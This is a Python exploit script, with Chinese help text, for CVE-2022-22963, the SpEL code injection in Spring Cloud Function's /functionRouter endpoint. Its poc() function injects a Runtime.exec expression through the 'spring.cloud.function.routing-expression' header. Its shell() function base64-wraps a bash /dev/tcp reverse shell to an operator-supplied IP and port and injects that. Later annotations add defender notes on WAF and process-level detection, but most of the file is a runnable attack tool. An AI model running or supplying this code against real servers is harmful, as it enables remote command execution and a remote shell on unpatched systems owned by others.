CVE-2022-22963

# Spring Cloud Function SpEL 代码注入 (CVE-2022-22963)

import requests
import argparse
import base64



# Base HTTP headers shared by every request in this script; poc() and shell()
# spread them into their own header dicts with `**headers`.
headers = {
    "Accept-Encoding": "gzip, deflate",
    "Accept": "*/*",
    # Fixed, browser-like User-Agent string sent with every request.
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36",
    "Connection": "close",
    # Declared as form-encoded, although the body the functions send is the
    # bare string 'test'.
    "Content-Type": "application/x-www-form-urlencoded",

}
# Module-level body placeholder. poc() and shell() each assign their own local
# `data`, so no code visible here reads this one.
data = 'test'
def poc(url, cmd):
    """POST a fixed SpEL expression to ``<url>/functionRouter`` in a header.

    This is the request shape associated with CVE-2022-22963 (Spring Cloud
    Function SpEL injection): the expression travels in the
    ``spring.cloud.function.routing-expression`` request header, not in the
    body.

    Args:
        url: Base URL of the service; ``/functionRouter`` is appended as-is.
        cmd: Not referenced by the body as written.

    Returns:
        None. The HTTP response is discarded, so the caller learns nothing
        about how the server handled the request.
    """
    # Path of the routing endpoint the request is sent to.
    ur = "/functionRouter"
    payload = {
        **headers,
        # Defender note: this header name on inbound traffic, particularly with
        # a value containing `T(java.lang.Runtime)`, is the signal to alert on
        # or strip at the proxy/WAF. The durable fix is upgrading Spring Cloud
        # Function to a release that patches CVE-2022-22963.
        'spring.cloud.function.routing-expression': 'T(java.lang.Runtime).getRuntime().exec("cmd")',
    }
    # Placeholder request body; the visible code gives it no other role.
    data = 'test'
    # verify=False disables TLS certificate validation. No timeout is set and
    # the response object is not inspected.
    requests.post(url=url + ur, headers=payload, data=data,verify=False)


def shell(url, ip, prot):
    """POST a SpEL expression carrying a base64-wrapped bash command to ``<url>/functionRouter``.

    The command string is built from ``ip`` and ``prot``, base64-encoded,
    substituted into a bash decode-and-run template, and placed in the
    ``spring.cloud.function.routing-expression`` request header.

    Args:
        url: Base URL of the service; ``/functionRouter`` is appended as-is.
        ip: Address interpolated into the command string without validation.
        prot: Port interpolated into the command string without validation
            (the CLI help text for ``-p`` describes it as a port).

    Returns:
        None. The HTTP response is discarded.
    """
    # Path of the routing endpoint the request is sent to.
    ur = "/functionRouter"
    # Bash command that opens an interactive shell over /dev/tcp to ip:prot.
    sh = f'/bin/bash -i >& /dev/tcp/{ip}/{prot} 0>&1'
    # str -> bytes -> base64 bytes -> str, so the command can be embedded as text.
    data1 = sh.encode('utf-8')
    encoded_data = base64.b64encode(data1)
    encoded_sh = encoded_data.decode('utf-8')
    # Template in which the literal "123" is a placeholder for the base64 text.
    shel = 'bash -c {echo,123}|{base64,-d}|{bash,-i}'
    cmd = shel.replace("123", encoded_sh)
    payload = {
        **headers,
        # Defender note: on an affected host this would be expected to surface
        # as the Java process spawning bash with a base64-decode pipeline,
        # followed by an outbound TCP connection from the application server.
        # Both are worth alerting on, alongside the header name itself at the
        # proxy/WAF.
        'spring.cloud.function.routing-expression': 'T(java.lang.Runtime).getRuntime().exec("' + cmd + '")',
    }
    # Placeholder request body; the visible code gives it no other role.
    data = 'test'
    # verify=False disables TLS certificate validation. No timeout is set and
    # the response object is not inspected.
    requests.post(url=url + ur, headers=payload, data=data,verify=False)


def main():
    """Parse the command line and dispatch to ``shell`` or ``poc``.

    Options (help strings are in Chinese and kept as-is):
        -u/--url   base URL passed to the request functions
        -c/--cmd   command string passed to ``poc``
        -i/--ip    address passed to ``shell``
        -p/--prot  port passed to ``shell``

    Dispatch order: if both ``--ip`` and ``--prot`` are set, ``shell`` runs
    (``--url`` is not checked on that path, so it may be ``None``); otherwise
    if ``--url`` is set, ``poc`` runs; otherwise a short help hint is printed.
    """
    cli = argparse.ArgumentParser()
    option_specs = (
        ('-u', '--url', 'url', '输入url'),
        ('-c', '--cmd', 'cmd', '输入要执行的命令'),
        ('-i', '--ip', 'ip', '输入反弹ip'),
        ('-p', '--prot', 'prot', '输入反弹端口'),
    )
    for short_flag, long_flag, dest_name, help_text in option_specs:
        cli.add_argument(short_flag, long_flag, dest=dest_name, help=help_text)
    opts = cli.parse_args()

    # Guard-clause form of the original if/elif/else chain; same precedence.
    if opts.ip and opts.prot:
        shell(opts.url, opts.ip, opts.prot)
        return
    if opts.url:
        poc(opts.url, opts.cmd)
        return
    print('-h 帮助')


# Run the CLI only when the file is executed as a script, not when imported.
if __name__ == '__main__':
    main()